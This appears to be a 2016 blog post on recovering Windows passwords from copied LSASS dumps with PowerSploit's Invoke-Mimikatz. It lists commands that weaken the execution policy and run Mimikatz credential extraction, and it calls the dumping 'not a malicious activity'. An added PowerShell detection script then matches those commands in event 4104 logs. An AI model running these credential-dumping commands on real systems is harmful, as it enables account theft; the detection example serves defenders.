Saturday, 20 August 2016

Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz

Came across a scenario where I was able to run PowerSploit on one of the machines (HOST) with antivirus.

However, I wanted to crack passwords for other systems!

Simply get an LSASS dump from the other machines - not a malicious activity!
Copy all those LSASS dump files to (HOST) and use the PowerSploit -Command argument to retrieve passwords from the LSASS dumps.

Executing the PowerSploit Invoke-Mimikatz tool to retrieve passwords from an LSASS dump file.

Commands Quick Reference :

  1. Get-ExecutionPolicy
  2. Set-ExecutionPolicy Unrestricted
  3. Import-Module .\powersploit.psm1
  4. Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'
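
From the defender's side, each command in the list above is visible in PowerShell script block logging (event ID 4104). The following is an added example, not part of the original post: it matches those strings against constructed sample events. The function name Find-MimikatzIndicators, the indicator labels and the sample records are assumptions made for illustration.

```powershell
# Added detection example. Patterns are taken from the quick reference above;
# -match is case-insensitive, so 'logonPasswords' and 'logonpasswords' both hit.
$Indicators = [ordered]@{
    'Execution policy weakened' = 'Set-ExecutionPolicy\s+(Unrestricted|Bypass)'
    'PowerSploit module import' = 'Import-Module\s+\S*powersploit'
    'Invoke-Mimikatz call'      = 'Invoke-Mimikatz'
    'Debug privilege request'   = 'privilege::debug'
    'Offline LSASS dump parsed' = 'sekurlsa::minidump'
    'Credential extraction'     = 'sekurlsa::logonpasswords'
}

function Find-MimikatzIndicators {
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [psobject]$Record   # needs TimeCreated, Computer, ScriptBlockText
    )
    process {
        foreach ($name in $Indicators.Keys) {
            if ($Record.ScriptBlockText -match $Indicators[$name]) {
                [pscustomobject]@{
                    TimeCreated = $Record.TimeCreated
                    Computer    = $Record.Computer
                    Indicator   = $name
                }
            }
        }
    }
}

# Constructed sample records (not real logs), shaped like parsed 4104 events.
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = [datetime]'2016-08-20T10:00:00'; Computer = 'HOST'
        ScriptBlockText = 'Get-Process | Sort-Object CPU' }
    [pscustomobject]@{ TimeCreated = [datetime]'2016-08-20T10:01:00'; Computer = 'HOST'
        ScriptBlockText = 'Set-ExecutionPolicy Unrestricted' }
    [pscustomobject]@{ TimeCreated = [datetime]'2016-08-20T10:02:00'; Computer = 'HOST'
        ScriptBlockText = 'Import-Module .\powersploit.psm1' }
    [pscustomobject]@{ TimeCreated = [datetime]'2016-08-20T10:03:00'; Computer = 'HOST'
        ScriptBlockText = 'Invoke-Mimikatz -Command ''"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"''' }
)

$SampleEvents | Find-MimikatzIndicators | Format-Table -AutoSize

# Live use (script block logging must be enabled on the monitored host):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#   ForEach-Object { [pscustomobject]@{ TimeCreated = $_.TimeCreated; Computer = $_.MachineName
#                                       ScriptBlockText = $_.Properties[2].Value } } |
#   Find-MimikatzIndicators
```

Because the dump is parsed on HOST rather than on the machine it came from, the `sekurlsa::minidump` indicator fires on HOST only; the source machines need separate monitoring for process access to lsass.exe.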
